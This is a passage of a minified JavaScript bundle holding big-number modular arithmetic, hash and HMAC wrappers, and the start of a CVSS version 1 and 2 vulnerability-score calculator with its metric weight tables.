v=(0|this.words[A])*l,P=(67108863&v)+(67108863&f);f>>=26,f+=v/67108864|0,f+=P>>>26,this.words[A]=67108863&P}return 0!==f&&(this.words[A]=f,this.length++),this},I.prototype.muln=function(l){return this.clone().imuln(l)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(l){var f=function M(z){for(var l=new Array(z.bitLength()),f=0;f<l.length;f++){var v=f%26;l[f]=(z.words[f/26|0]&1<<v)>>>v}return l}(l);if(0===f.length)return new I(1);for(var A=this,v=0;v<f.length&&0===f[v];v++,A=A.sqr());if(++v<f.length)for(var P=A.sqr();v<f.length;v++,P=P.sqr())0!==f[v]&&(A=A.mul(P));return A},I.prototype.iushln=function(l){$("number"==typeof l&&l>=0);var P,f=l%26,A=(l-f)/26,v=67108863>>>26-f<<26-f;if(0!==f){var G=0;for(P=0;P<this.length;P++){var X=this.words[P]&v;this.words[P]=(0|this.words[P])-X<<f|G,G=X>>>26-f}G&&(this.words[P]=G,this.length++)}if(0!==A){for(P=this.length-1;P>=0;P--)this.words[P+A]=this.words[P];for(P=0;P<A;P++)this.words[P]=0;this.length+=A}return this.strip()},I.prototype.ishln=function(l){return $(0===this.negative),this.iushln(l)},I.prototype.iushrn=function(l,f,A){var v;$("number"==typeof l&&l>=0),v=f?(f-f%26)/26:0;var P=l%26,G=Math.min((l-P)/26,this.length),X=67108863^67108863>>>P<<P,L=A;if(v-=G,v=Math.max(0,v),L){for(var h=0;h<G;h++)L.words[h]=this.words[h];L.length=G}if(0!==G)if(this.length>G)for(this.length-=G,h=0;h<this.length;h++)this.words[h]=this.words[h+G];else this.words[0]=0,this.length=1;var R=0;for(h=this.length-1;h>=0&&(0!==R||h>=v);h--){var J=0|this.words[h];this.words[h]=R<<26-P|J>>>P,R=J&X}return L&&0!==R&&(L.words[L.length++]=R),0===this.length&&(this.words[0]=0,this.length=1),this.strip()},I.prototype.ishrn=function(l,f,A){return $(0===this.negative),this.iushrn(l,f,A)},I.prototype.shln=function(l){return this.clone().ishln(l)},I.prototype.ushln=function(l){return this.clone().iushln(l)},I.prototype.shrn=function(l){return this.clone().ishrn(l)},I.prototype.ushrn=function(l){return this.clone().iushrn(l)},I.prototype.testn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return!(this.length<=A||!(this.words[A]&1<<f))},I.prototype.imaskn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return $(0===this.negative,"imaskn works only with positive numbers"),this.length<=A?this:(0!==f&&A++,this.length=Math.min(A,this.length),0!==f&&(this.words[this.length-1]&=67108863^67108863>>>f<<f),this.strip())},I.prototype.maskn=function(l){return this.clone().imaskn(l)},I.prototype.iaddn=function(l){return $("number"==typeof l),$(l<67108864),l<0?this.isubn(-l):0!==this.negative?1===this.length&&(0|this.words[0])<l?(this.words[0]=l-(0|this.words[0]),this.negative=0,this):(this.negative=0,this.isubn(l),this.negative=1,this):this._iaddn(l)},I.prototype._iaddn=function(l){this.words[0]+=l;for(var f=0;f<this.length&&this.words[f]>=67108864;f++)this.words[f]-=67108864,f===this.length-1?this.words[f+1]=1:this.words[f+1]++;return this.length=Math.max(this.length,f+1),this},I.prototype.isubn=function(l){if($("number"==typeof l),$(l<67108864),l<0)return this.iaddn(-l);if(0!==this.negative)return this.negative=0,this.iaddn(l),this.negative=1,this;if(this.words[0]-=l,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var f=0;f<this.length&&this.words[f]<0;f++)this.words[f]+=67108864,this.words[f+1]-=1;return this.strip()},I.prototype.addn=function(l){return this.clone().iaddn(l)},I.prototype.subn=function(l){return this.clone().isubn(l)},I.prototype.iabs=function(){return this.negative=0,this},I.prototype.abs=function(){return this.clone().iabs()},I.prototype._ishlnsubmul=function(l,f,A){var P;this._expand(l.length+A);var G,X=0;for(P=0;P<l.length;P++){G=(0|this.words[P+A])+X;var L=(0|l.words[P])*f;X=((G-=67108863&L)>>26)-(L/67108864|0),this.words[P+A]=67108863&G}for(;P<this.length-A;P++)X=(G=(0|this.words[P+A])+X)>>26,this.words[P+A]=67108863&G;if(0===X)return this.strip();for($(-1===X),X=0,P=0;P<this.length;P++)X=(G=-(0|this.words[P])+X)>>26,this.words[P]=67108863&G;return this.negative=1,this.strip()},I.prototype._wordDiv=function(l,f){var A,v=this.clone(),P=l,G=0|P.words[P.length-1];0!=(A=26-this._countBits(G))&&(P=P.ushln(A),v.iushln(A),G=0|P.words[P.length-1]);var h,L=v.length-P.length;if("mod"!==f){(h=new I(null)).length=L+1,h.words=new Array(h.length);for(var R=0;R<h.length;R++)h.words[R]=0}var J=v.clone()._ishlnsubmul(P,1,L);0===J.negative&&(v=J,h&&(h.words[L]=1));for(var Z=L-1;Z>=0;Z--){var ue=67108864*(0|v.words[P.length+Z])+(0|v.words[P.length+Z-1]);for(ue=Math.min(ue/G|0,67108863),v._ishlnsubmul(P,ue,Z);0!==v.negative;)ue--,v.negative=0,v._ishlnsubmul(P,1,Z),v.isZero()||(v.negative^=1);h&&(h.words[Z]=ue)}return h&&h.strip(),v.strip(),"div"!==f&&0!==A&&v.iushrn(A),{div:h||null,mod:v}},I.prototype.divmod=function(l,f,A){return $(!l.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===l.negative?(G=this.neg().divmod(l,f),"mod"!==f&&(v=G.div.neg()),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.iadd(l)),{div:v,mod:P}):0===this.negative&&0!==l.negative?(G=this.divmod(l.neg(),f),"mod"!==f&&(v=G.div.neg()),{div:v,mod:G.mod}):0!=(this.negative&l.negative)?(G=this.neg().divmod(l.neg(),f),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.isub(l)),{div:G.div,mod:P}):l.length>this.length||this.cmp(l)<0?{div:new I(0),mod:this}:1===l.length?"div"===f?{div:this.divn(l.words[0]),mod:null}:"mod"===f?{div:null,mod:new I(this.modn(l.words[0]))}:{div:this.divn(l.words[0]),mod:new I(this.modn(l.words[0]))}:this._wordDiv(l,f);var v,P,G},I.prototype.div=function(l){return this.divmod(l,"div",!1).div},I.prototype.mod=function(l){return this.divmod(l,"mod",!1).mod},I.prototype.umod=function(l){return this.divmod(l,"mod",!0).mod},I.prototype.divRound=function(l){var f=this.divmod(l);if(f.mod.isZero())return f.div;var A=0!==f.div.negative?f.mod.isub(l):f.mod,v=l.ushrn(1),P=l.andln(1),G=A.cmp(v);return G<0||1===P&&0===G?f.div:0!==f.div.negative?f.div.isubn(1):f.div.iaddn(1)},I.prototype.modn=function(l){$(l<=67108863);for(var f=(1<<26)%l,A=0,v=this.length-1;v>=0;v--)A=(f*A+(0|this.words[v]))%l;return A},I.prototype.idivn=function(l){$(l<=67108863);for(var f=0,A=this.length-1;A>=0;A--){var v=(0|this.words[A])+67108864*f;this.words[A]=v/l|0,f=v%l}return this.strip()},I.prototype.divn=function(l){return this.clone().idivn(l)},I.prototype.egcd=function(l){$(0===l.negative),$(!l.isZero());var f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=new I(0),X=new I(1),L=0;f.isEven()&&A.isEven();)f.iushrn(1),A.iushrn(1),++L;for(var h=A.clone(),R=f.clone();!f.isZero();){for(var J=0,Z=1;0==(f.words[0]&Z)&&J<26;++J,Z<<=1);if(J>0)for(f.iushrn(J);J-- >0;)(v.isOdd()||P.isOdd())&&(v.iadd(h),P.isub(R)),v.iushrn(1),P.iushrn(1);for(var ue=0,Ie=1;0==(A.words[0]&Ie)&&ue<26;++ue,Ie<<=1);if(ue>0)for(A.iushrn(ue);ue-- >0;)(G.isOdd()||X.isOdd())&&(G.iadd(h),X.isub(R)),G.iushrn(1),X.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(G),P.isub(X)):(A.isub(f),G.isub(v),X.isub(P))}return{a:G,b:X,gcd:A.iushln(L)}},I.prototype._invmp=function(l){$(0===l.negative),$(!l.isZero());var J,f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=A.clone();f.cmpn(1)>0&&A.cmpn(1)>0;){for(var X=0,L=1;0==(f.words[0]&L)&&X<26;++X,L<<=1);if(X>0)for(f.iushrn(X);X-- >0;)v.isOdd()&&v.iadd(G),v.iushrn(1);for(var h=0,R=1;0==(A.words[0]&R)&&h<26;++h,R<<=1);if(h>0)for(A.iushrn(h);h-- >0;)P.isOdd()&&P.iadd(G),P.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(P)):(A.isub(f),P.isub(v))}return(J=0===f.cmpn(1)?v:P).cmpn(0)<0&&J.iadd(l),J},I.prototype.gcd=function(l){if(this.isZero())return l.abs();if(l.isZero())return this.abs();var f=this.clone(),A=l.clone();f.negative=0,A.negative=0;for(var v=0;f.isEven()&&A.isEven();v++)f.iushrn(1),A.iushrn(1);for(;;){for(;f.isEven();)f.iushrn(1);for(;A.isEven();)A.iushrn(1);var P=f.cmp(A);if(P<0){var G=f;f=A,A=G}else if(0===P||0===A.cmpn(1))break;f.isub(A)}return A.iushln(v)},I.prototype.invm=function(l){return this.egcd(l).a.umod(l)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(l){return this.words[0]&l},I.prototype.bincn=function(l){$("number"==typeof l);var f=l%26,A=(l-f)/26,v=1<<f;if(this.length<=A)return this._expand(A+1),this.words[A]|=v,this;for(var P=v,G=A;0!==P&&G<this.length;G++){var X=0|this.words[G];P=(X+=P)>>>26,this.words[G]=X&=67108863}return 0!==P&&(this.words[G]=P,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(l){var A,f=l<0;if(0!==this.negative&&!f)return-1;if(0===this.negative&&f)return 1;if(this.strip(),this.length>1)A=1;else{f&&(l=-l),$(l<=67108863,"Number is too big");var v=0|this.words[0];A=v===l?0:v<l?-1:1}return 0!==this.negative?0|-A:A},I.prototype.cmp=function(l){if(0!==this.negative&&0===l.negative)return-1;if(0===this.negative&&0!==l.negative)return 1;var f=this.ucmp(l);return 0!==this.negative?0|-f:f},I.prototype.ucmp=function(l){if(this.length>l.length)return 1;if(this.length<l.length)return-1;for(var f=0,A=this.length-1;A>=0;A--){var v=0|this.words[A],P=0|l.words[A];if(v!==P){v<P?f=-1:v>P&&(f=1);break}}return f},I.prototype.gtn=function(l){return 1===this.cmpn(l)},I.prototype.gt=function(l){return 1===this.cmp(l)},I.prototype.gten=function(l){return this.cmpn(l)>=0},I.prototype.gte=function(l){return this.cmp(l)>=0},I.prototype.ltn=function(l){return-1===this.cmpn(l)},I.prototype.lt=function(l){return-1===this.cmp(l)},I.prototype.lten=function(l){return this.cmpn(l)<=0},I.prototype.lte=function(l){return this.cmp(l)<=0},I.prototype.eqn=function(l){return 0===this.cmpn(l)},I.prototype.eq=function(l){return 0===this.cmp(l)},I.red=function(l){return new le(l)},I.prototype.toRed=function(l){return $(!this.red,"Already a number in reduction context"),$(0===this.negative,"red works only with positives"),l.convertTo(this)._forceRed(l)},I.prototype.fromRed=function(){return $(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(l){return this.red=l,this},I.prototype.forceRed=function(l){return $(!this.red,"Already a number in reduction context"),this._forceRed(l)},I.prototype.redAdd=function(l){return $(this.red,"redAdd works only with red numbers"),this.red.add(this,l)},I.prototype.redIAdd=function(l){return $(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,l)},I.prototype.redSub=function(l){return $(this.red,"redSub works only with red numbers"),this.red.sub(this,l)},I.prototype.redISub=function(l){return $(this.red,"redISub works only with red numbers"),this.red.isub(this,l)},I.prototype.redShl=function(l){return $(this.red,"redShl works only with red numbers"),this.red.shl(this,l)},I.prototype.redMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.mul(this,l)},I.prototype.redIMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.imul(this,l)},I.prototype.redSqr=function(){return $(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return $(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return $(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return $(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return $(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(l){return $(this.red&&!l.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,l)};var O={k256:null,p224:null,p192:null,p25519:null};function U(z,l){this.name=z,this.p=new I(l,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function K(){U.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function ee(){U.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function se(){U.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function ve(){U.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function le(z){if("string"==typeof z){var l=I._prime(z);this.m=l.p,this.prime=l}else $(z.gtn(1),"modulus must be greater than 1"),this.m=z,this.prime=null}function ye(z){le.call(this,z),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}U.prototype._tmp=function(){var l=new I(null);return l.words=new Array(Math.ceil(this.n/13)),l},U.prototype.ireduce=function(l){var A,f=l;do{this.split(f,this.tmp),A=(f=(f=this.imulK(f)).iadd(this.tmp)).bitLength()}while(A>this.n);var v=A<this.n?-1:f.ucmp(this.p);return 0===v?(f.words[0]=0,f.length=1):v>0?f.isub(this.p):void 0!==f.strip?f.strip():f._strip(),f},U.prototype.split=function(l,f){l.iushrn(this.n,0,f)},U.prototype.imulK=function(l){return l.imul(this.k)},ae(K,U),K.prototype.split=function(l,f){for(var A=4194303,v=Math.min(l.length,9),P=0;P<v;P++)f.words[P]=l.words[P];if(f.length=v,l.length<=9)return l.words[0]=0,void(l.length=1);var G=l.words[9];for(f.words[f.length++]=G&A,P=10;P<l.length;P++){var X=0|l.words[P];l.words[P-10]=(X&A)<<4|G>>>22,G=X}l.words[P-10]=G>>>=22,l.length-=0===G&&l.length>10?10:9},K.prototype.imulK=function(l){l.words[l.length]=0,l.words[l.length+1]=0,l.length+=2;for(var f=0,A=0;A<l.length;A++){var v=0|l.words[A];l.words[A]=67108863&(f+=977*v),f=64*v+(f/67108864|0)}return 0===l.words[l.length-1]&&(l.length--,0===l.words[l.length-1]&&l.length--),l},ae(ee,U),ae(se,U),ae(ve,U),ve.prototype.imulK=function(l){for(var f=0,A=0;A<l.length;A++){var v=19*(0|l.words[A])+f,P=67108863&v;v>>>=26,l.words[A]=P,f=v}return 0!==f&&(l.words[l.length++]=f),l},I._prime=function(l){if(O[l])return O[l];var f;if("k256"===l)f=new K;else if("p224"===l)f=new ee;else if("p192"===l)f=new se;else{if("p25519"!==l)throw new Error("Unknown prime "+l);f=new ve}return O[l]=f,f},le.prototype._verify1=function(l){$(0===l.negative,"red works only with positives"),$(l.red,"red works only with red numbers")},le.prototype._verify2=function(l,f){$(0==(l.negative|f.negative),"red works only with positives"),$(l.red&&l.red===f.red,"red works only with red numbers")},le.prototype.imod=function(l){return this.prime?this.prime.ireduce(l)._forceRed(this):l.umod(this.m)._forceRed(this)},le.prototype.neg=function(l){return l.isZero()?l.clone():this.m.sub(l)._forceRed(this)},le.prototype.add=function(l,f){this._verify2(l,f);var A=l.add(f);return A.cmp(this.m)>=0&&A.isub(this.m),A._forceRed(this)},le.prototype.iadd=function(l,f){this._verify2(l,f);var A=l.iadd(f);return A.cmp(this.m)>=0&&A.isub(this.m),A},le.prototype.sub=function(l,f){this._verify2(l,f);var A=l.sub(f);return A.cmpn(0)<0&&A.iadd(this.m),A._forceRed(this)},le.prototype.isub=function(l,f){this._verify2(l,f);var A=l.isub(f);return A.cmpn(0)<0&&A.iadd(this.m),A},le.prototype.shl=function(l,f){return this._verify1(l),this.imod(l.ushln(f))},le.prototype.imul=function(l,f){return this._verify2(l,f),this.imod(l.imul(f))},le.prototype.mul=function(l,f){return this._verify2(l,f),this.imod(l.mul(f))},le.prototype.isqr=function(l){return this.imul(l,l.clone())},le.prototype.sqr=function(l){return this.mul(l,l)},le.prototype.sqrt=function(l){if(l.isZero())return l.clone();var f=this.m.andln(3);if($(f%2==1),3===f){var A=this.m.add(new I(1)).iushrn(2);return this.pow(l,A)}for(var v=this.m.subn(1),P=0;!v.isZero()&&0===v.andln(1);)P++,v.iushrn(1);$(!v.isZero());var G=new I(1).toRed(this),X=G.redNeg(),L=this.m.subn(1).iushrn(1),h=this.m.bitLength();for(h=new I(2*h*h).toRed(this);0!==this.pow(h,L).cmp(X);)h.redIAdd(X);for(var R=this.pow(h,v),J=this.pow(l,v.addn(1).iushrn(1)),Z=this.pow(l,v),ue=P;0!==Z.cmp(G);){for(var Ie=Z,Ae=0;0!==Ie.cmp(G);Ae++)Ie=Ie.redSqr();$(Ae<ue);var Ue=this.pow(R,new I(1).iushln(ue-Ae-1));J=J.redMul(Ue),R=Ue.redSqr(),Z=Z.redMul(R),ue=Ae}return J},le.prototype.invm=function(l){var f=l._invmp(this.m);return 0!==f.negative?(f.negative=0,this.imod(f).redNeg()):this.imod(f)},le.prototype.pow=function(l,f){if(f.isZero())return new I(1).toRed(this);if(0===f.cmpn(1))return l.clone();var v=new Array(16);v[0]=new I(1).toRed(this),v[1]=l;for(var P=2;P<v.length;P++)v[P]=this.mul(v[P-1],l);var G=v[0],X=0,L=0,h=f.bitLength()%26;for(0===h&&(h=26),P=f.length-1;P>=0;P--){for(var R=f.words[P],J=h-1;J>=0;J--){var Z=R>>J&1;G!==v[0]&&(G=this.sqr(G)),0!==Z||0!==X?(X<<=1,X|=Z,(4==++L||0===P&&0===J)&&(G=this.mul(G,v[X]),L=0,X=0)):L=0}h=26}return G},le.prototype.convertTo=function(l){var f=l.umod(this.m);return f===l?f.clone():f},le.prototype.convertFrom=function(l){var f=l.clone();return f.red=null,f},I.mont=function(l){return new ye(l)},ae(ye,le),ye.prototype.convertTo=function(l){return this.imod(l.ushln(this.shift))},ye.prototype.convertFrom=function(l){var f=this.imod(l.mul(this.rinv));return f.red=null,f},ye.prototype.imul=function(l,f){if(l.isZero()||f.isZero())return l.words[0]=0,l.length=1,l;var A=l.imul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.mul=function(l,f){if(l.isZero()||f.isZero())return new I(0)._forceRed(this);var A=l.mul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.invm=function(l){return this.imod(l._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},2161:(Pe,we,de)=>{"use strict";var ie=de(2270),j=de(807),$=de(1447),ae=de(6890),I=de(4003);function Q(F){I.call(this,"digest"),this._hash=F}ie(Q,I),Q.prototype._update=function(F){this._hash.update(F)},Q.prototype._final=function(){return this._hash.digest()},Pe.exports=function(E){return"md5"===(E=E.toLowerCase())?new j:"rmd160"===E||"ripemd160"===E?new $:new Q(ae(E))}},6853:(Pe,we,de)=>{var ie=de(807);Pe.exports=function(j){return(new ie).update(j).digest()}},4295:(Pe,we,de)=>{"use strict";var ie=de(2270),j=de(1536),$=de(4003),ae=de(265).Buffer,I=de(6853),Q=de(1447),F=de(6890),E=ae.alloc(128);function g(b,_){$.call(this,"digest"),"string"==typeof _&&(_=ae.from(_));var y="sha512"===b||"sha384"===b?128:64;this._alg=b,this._key=_,_.length>y?_=("rmd160"===b?new Q:F(b)).update(_).digest():_.length<y&&(_=ae.concat([_,E],y));for(var p=this._ipad=ae.allocUnsafe(y),D=this._opad=ae.allocUnsafe(y),w=0;w<y;w++)p[w]=54^_[w],D[w]=92^_[w];this._hash="rmd160"===b?new Q:F(b),this._hash.update(p)}ie(g,$),g.prototype._update=function(b){this._hash.update(b)},g.prototype._final=function(){var b=this._hash.digest();return("rmd160"===this._alg?new Q:F(this._alg)).update(this._opad).update(b).digest()},Pe.exports=function(_,y){return"rmd160"===(_=_.toLowerCase())||"ripemd160"===_?new g("rmd160",y):"md5"===_?new j(I,y):new g(_,y)}},1536:(Pe,we,de)=>{"use strict";var ie=de(2270),j=de(265).Buffer,$=de(4003),ae=j.alloc(128),I=64;function Q(F,E){$.call(this,"digest"),"string"==typeof E&&(E=j.from(E)),this._alg=F,this._key=E,E.length>I?E=F(E):E.length<I&&(E=j.concat([E,ae],I));for(var g=this._ipad=j.allocUnsafe(I),b=this._opad=j.allocUnsafe(I),_=0;_<I;_++)g[_]=54^E[_],b[_]=92^E[_];this._hash=[g]}ie(Q,$),Q.prototype._update=function(F){this._hash.push(F)},Q.prototype._final=function(){var F=this._alg(j.concat(this._hash));return this._alg(j.concat([this._opad,F]))},Pe.exports=Q},882:(Pe,we,de)=>{"use strict";we.O6=de(2419),de(2161),de(4295);var j=de(2196),$=Object.keys(j),I=(["sha1","sha224","sha256","sha384","sha512","md5","rmd160"].concat($),de(8597));we.Sf=I.pbkdf2Sync;var Q=de(4271);we.CW=Q.createCipheriv,we.G_=Q.createDecipheriv;de(782),de(9494);de(4707);de(8831),de(3478)},306:function(Pe){"undefined"!=typeof self&&self,Pe.exports=function(we){var de={};function ie(j){if(de[j])return de[j].exports;var $=de[j]={i:j,l:!1,exports:{}};return we[j].call($.exports,$,$.exports,ie),$.l=!0,$.exports}return ie.m=we,ie.c=de,ie.d=function(j,$,ae){ie.o(j,$)||Object.defineProperty(j,$,{enumerable:!0,get:ae})},ie.r=function(j){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(j,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(j,"__esModule",{value:!0})},ie.t=function(j,$){if(1&$&&(j=ie(j)),8&$||4&$&&"object"==typeof j&&j&&j.__esModule)return j;var ae=Object.create(null);if(ie.r(ae),Object.defineProperty(ae,"default",{enumerable:!0,value:j}),2&$&&"string"!=typeof j)for(var I in j)ie.d(ae,I,function(Q){return j[Q]}.bind(null,I));return ae},ie.n=function(j){var $=j&&j.__esModule?function(){return j.default}:function(){return j};return ie.d($,"a",$),$},ie.o=function(j,$){return Object.prototype.hasOwnProperty.call(j,$)},ie.p="",ie(ie.s=1)}([function(we,de){function ie($,ae){return function(I){if(Array.isArray(I))return I}($)||function(I,Q){if("undefined"!=typeof Symbol&&Symbol.iterator in Object(I)){var F=[],E=!0,g=!1,b=void 0;try{for(var _,y=I[Symbol.iterator]();!(E=(_=y.next()).done)&&(F.push(_.value),!Q||F.length!==Q);E=!0);}catch(M){g=!0,b=M}finally{try{E||null==y.return||y.return()}finally{if(g)throw b}}return F}}($,ae)||function(I,Q){if(I){if("string"==typeof I)return j(I,Q);var F=Object.prototype.toString.call(I).slice(8,-1);if("Object"===F&&I.constructor&&(F=I.constructor.name),"Map"===F||"Set"===F)return Array.from(I);if("Arguments"===F||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(F))return j(I,Q)}}($,ae)||function(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}function j($,ae){(null==ae||ae>$.length)&&(ae=$.length);for(var I=0,Q=new Array(ae);I<ae;I++)Q[I]=$[I];return Q}de.getMetricCodeMap=function($){for(var ae=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},I={},Q=0,F=Object.entries($);Q<F.length;Q++){var E=ie(F[Q],2),g=E[0],b=E[1],_=ae[g]||g.split(" ").map(function(z){return z.charAt(0)}).join("").toUpperCase();I[_]={name:g};for(var y=0,M=Object.entries(b);y<M.length;y++){var D=ie(M[y],1)[0],w=ae[D]||D.split(" ").map(function(z){return z.charAt(0)}).join("").toUpperCase();I[_][w]=D}}for(var x=0,S=Object.entries(I);x<S.length;x++){var O=ie(S[x],2),U=O[0],K=O[1];U.length>1&&!I[U.charAt(0)]&&(I[U.charAt(0)]=K);for(var ee=0,se=Object.entries(K);ee<se.length;ee++){var ve=ie(se[ee],2),le=ve[0],ye=ve[1];le.length>1&&!K[le.charAt(0)]&&(K[le.charAt(0)]=ye)}}return I},de.roundUp=function($){return Math.ceil(Math.round(1e5*(10*$+Number.EPSILON))/1e5)/10},de.round=function($){return Math.round(10*($+Number.EPSILON))/10},de.parseCvssVector=function($,ae,I){var Q,D,F={short:{},long:{}};F.short=(D={},$.split("/").forEach(function(w){var x=w.split(":");D[x[0]]=x[1]}),D),F.short.CVSS||(F.short.CVSS=(Q=F.short).IB?"1.0":Q.Au?"2.0":"3.1");for(var E=(ae||I[F.short.CVSS]).getMetricCodeMap(),g=0,b=Object.entries(F.short);g<b.length;g++){var _=ie(b[g],2),y=_[0];E[y]&&(F.long[E[y].name]=E[y][_[1]])}return F}},function(we,de,ie){"use strict";ie.r(de);var j=ie(0);function $(se,ve){for(var le=0;le<ve.length;le++){var ye=ve[le];ye.enumerable=ye.enumerable||!1,ye.configurable=!0,"value"in ye&&(ye.writable=!0),Object.defineProperty(se,ye.key,ye)}}var ae={"Access Vector":{Remote:1,Local:.7},"Access Complexity":{Low:1,High:.8},Authentication:{"Not Required":1,Required:.6},Confidentiality:{Complete:1,Partial:.7,None:0},Integrity:{Complete:1,Partial:.7,None:0},Availability:{Complete:1,Partial:.7,None:0},"Impact Bias":{Availability:[.25,.25,.5],Integrity:[.25,.5,.25],Confidentiality:[.5,.25,.25],Normal:[.333,.333,.333]},Exploitability:{"Not Defined":1,High:1,Functional:.95,"Proof of Concept":.9,Unproven:.85},"Remediation Level":{"Not Defined":1,Unavailable:1,Workaround:.95,"Temporary Fix ":.9,"Official Fix":.87},"Report Confidence":{"Not Defined":1,Confirmed:1,Uncorroborated:.95,Unconfirmed:.9},"Collateral Damage Potential":{"Not Defined":0,High:.5,Medium:.3,Low:.1,None:0},"Target Distribution":{"Not Defined":1,High:1,Medium:.75,Low:.25,None:0},get:function(se,ve){if(!ve[se])return Object.values(this[se])[0];var le=this[se][ve[se]];return"function"==typeof le?le(ve):le}},I=Object(j.getMetricCodeMap)(ae,{Authentication:"Au",Uncorroborated:"UR",Unconfirmed:"UC"}),Q=function(){function se(z){(function(l,f){if(!(l instanceof f))throw new TypeError("Cannot call a class as a function")})(this,se),this.cvss=z}var ve,le,ye;return ve=se,ye=[{key:"getMetricCodeMap",value:function(){return I}}],(le=[{key:"getImpactScore",value:function(){var z=ae.get("Impact Bias",this.cvss);return ae.get("Confidentiality",this.cvss)*z[0]+ae.get("Integrity",this.cvss)*z[1]+ae.get("Availability",this.cvss)*z[2]}},{key:"getExploitabilityScore",value:function(){return 10*ae.get("Access Vector",this.cvss)*ae.get("Access Complexity",this.cvss)*ae.get("Authentication",this.cvss)}},{key:"getBaseScore",value:function(){var z=this.getImpactScore(),l=this.getExploitabilityScore();return Object(j.round)(z*l)}},{key:"getTemporalScore",value:function(){return Object(j.round)(this.getBaseScore()*ae.get("Exploitability",this.cvss)*ae.get("Remediation Level",this.cvss)*ae.get("Report Confidence",this.cvss))}},{key:"getEnvironmentalScore",value:function(){var z=this.getTemporalScore();return Object(j.round)((z+(10-z)*ae.get("Collateral Damage Potential",this.cvss))*ae.get("Target Distribution",this.cvss))}}])&&$(ve.prototype,le),ye&&$(ve,ye),se}();function F(se,ve){for(var le=0;le<ve.length;le++){var ye=ve[le];ye.enumerable=ye.enumerable||!1,ye.configurable=!0,"value"in ye&&(ye.writable=!0),Object.defineProperty(se,ye.key,ye)}}var E={"Access Vector":{Network:1,"Adjacent Network":.646,Local:.395},"Access Complexity":{Low:.71,Medium:.61,High:.35},Authentication:{None:.704,Single:.56,Multiple:.45},Confidentiality:{Complete:.66,Partial:.275,None:0},Integrity:{Complete:.66,Partial:.275,None:0},Availability:{Complete:.66,Partial:.275,None:0},Exploitability:{"Not Defined":1,High:1,Functional:.95,"Proof of Concept":.9,Unproven:.85},"Remediation Level":{"Not Defined":1,Unavailable:1,Workaround:.95,"Temporary Fix ":.9,"Official Fix":.87},"Report Confidence":{"Not Defined":1,Confirmed:1,Uncorroborated:.95,Unconfirmed:.9},"Collateral Damage Potential":{"Not Defined":0,High:.5,"Medium-High":.4,"Low-Medium":.3,Low:.1,None:0},"Target Distribution":{"Not Defined":1,High:1,Medium:.75,Low:.25,None:0},"Confidentiality Requirement":{"Not Defined":1,High:1.51,Medium:1,Low:.5},"Integrity Requirement":{"Not Defined":1,High:1.51,Medium:1,Low:.5},"Availability Requirement":{"Not Defined":1,High:1.51,Medium:1,Low:.5},get:function(se,ve){if(!ve[se])return Object.values(this[se])[0];var le=this[se][ve[se]];return"function"==typeof 